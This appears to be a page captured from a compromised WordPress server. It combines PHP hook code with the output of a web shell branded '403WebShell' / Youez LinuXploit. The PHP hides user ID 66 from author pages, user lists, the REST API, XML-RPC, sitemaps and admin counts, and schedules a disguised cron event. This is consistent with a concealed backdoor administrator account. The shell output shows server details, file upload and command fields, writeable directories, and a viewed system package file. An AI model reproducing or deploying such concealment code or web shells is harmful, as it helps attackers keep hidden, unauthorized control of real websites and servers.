add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/python3-launchpadlib.md5sums
44e9e6378f105f08c0bd16b83522f0ef  usr/lib/python3/dist-packages/launchpadlib-1.11.0.egg-info/PKG-INFO
68b329da9893e34099c7d8ad5cb9c940  usr/lib/python3/dist-packages/launchpadlib-1.11.0.egg-info/dependency_links.txt
68b329da9893e34099c7d8ad5cb9c940  usr/lib/python3/dist-packages/launchpadlib-1.11.0.egg-info/not-zip-safe
20426b3e8f3da04d6382cd494e76cd78  usr/lib/python3/dist-packages/launchpadlib-1.11.0.egg-info/requires.txt
eeaf3af413ac7fcc853f5c5eedfa3436  usr/lib/python3/dist-packages/launchpadlib-1.11.0.egg-info/top_level.txt
8f1176fe2771a061c6a1aac4a88e6e70  usr/lib/python3/dist-packages/launchpadlib/__init__.py
ae98fb850b27acccd82cfa8d6910e258  usr/lib/python3/dist-packages/launchpadlib/apps.py
259d971bdcf98845d0d85b6906b9f91d  usr/lib/python3/dist-packages/launchpadlib/credentials.py
90f0d96118ede0cf6fe94f87c634f25b  usr/lib/python3/dist-packages/launchpadlib/errors.py
a36e8e504708e8fcb283d2edd2a2d93a  usr/lib/python3/dist-packages/launchpadlib/launchpad.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/launchpadlib/testing/__init__.py
014de98857d6702fbf68e721bd3b6221  usr/lib/python3/dist-packages/launchpadlib/testing/helpers.py
a69d6c53391d7b05bcbfd916c08ce9de  usr/lib/python3/dist-packages/launchpadlib/testing/launchpad-wadl.xml
80a87dbdeac5fd2a759b576f7a505e46  usr/lib/python3/dist-packages/launchpadlib/testing/launchpad.py
0d8acdb574421ff7ab66d4ed38e36f1b  usr/lib/python3/dist-packages/launchpadlib/testing/resources.py
93263a6f09fb8c87ffcae85e01b98c32  usr/lib/python3/dist-packages/launchpadlib/testing/testing-wadl.xml
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/launchpadlib/testing/tests/__init__.py
212e26071cd0398b84591b7f2b995a18  usr/lib/python3/dist-packages/launchpadlib/testing/tests/test_launchpad.py
ec7ac64cd40fde3eb2a8cd5d702753fa  usr/lib/python3/dist-packages/launchpadlib/tests/__init__.py
e14a46031f6e51e50c1c285a6730f697  usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
e5fdabe68b9bfbd133e281d070e29bb8  usr/lib/python3/dist-packages/launchpadlib/tests/test_http.py
64dafceaf063b2fd0a5f544aa4c38e15  usr/lib/python3/dist-packages/launchpadlib/tests/test_launchpad.py
2728c743c9d967376553fd40be077569  usr/lib/python3/dist-packages/launchpadlib/uris.py
b010766800a3746662b465f7f7573bbb  usr/lib/systemd/user/launchpadlib-cache-clean.service
333542a9d538fff463f14ab0a82a8760  usr/lib/systemd/user/launchpadlib-cache-clean.timer
284e4294d939cae818a8adcffb5ac294  usr/share/doc/python3-launchpadlib/README.rst
76dde68f4dbb1af09fa94e5f6f8a9ca1  usr/share/doc/python3-launchpadlib/changelog.Debian.gz
f467bc43b07b2f8b38bc3cfdc07104de  usr/share/doc/python3-launchpadlib/copyright
1dc1189855d9eea05e8841cdb5eb2b30  usr/share/doc/python3-launchpadlib/docs/CONTRIBUTING.rst
3c4142d1ab25af6794434e9076f1bda0  usr/share/doc/python3-launchpadlib/docs/Makefile
add177e74fb5da649a3dd2d19c007807  usr/share/doc/python3-launchpadlib/docs/command-line.rst
ea4b7689201a7284632a0ff23e64bc17  usr/share/doc/python3-launchpadlib/docs/conf.py.gz
04f30a098ab8ae788dd57aa8bb78689b  usr/share/doc/python3-launchpadlib/docs/files/mugshot.png
f4849b06046fce3404d1d493f7eb79a0  usr/share/doc/python3-launchpadlib/docs/hosted-files.rst
5b1b6396fe3f09ddd88af56d70d1acb3  usr/share/doc/python3-launchpadlib/docs/index.rst
3237d481bd4fde3cdef55d09da56ce3b  usr/share/doc/python3-launchpadlib/docs/introduction.rst.gz
c98a67e4304e0693db5e5f739bed7534  usr/share/doc/python3-launchpadlib/docs/operations.rst
d536c43b3cd5b99bba29196457423ba0  usr/share/doc/python3-launchpadlib/docs/people.rst.gz
022950219bead5ab748ab2bcccf066c0  usr/share/doc/python3-launchpadlib/docs/toplevel.rst

Youez - 2016 - github.com/yon3zu
LinuXploit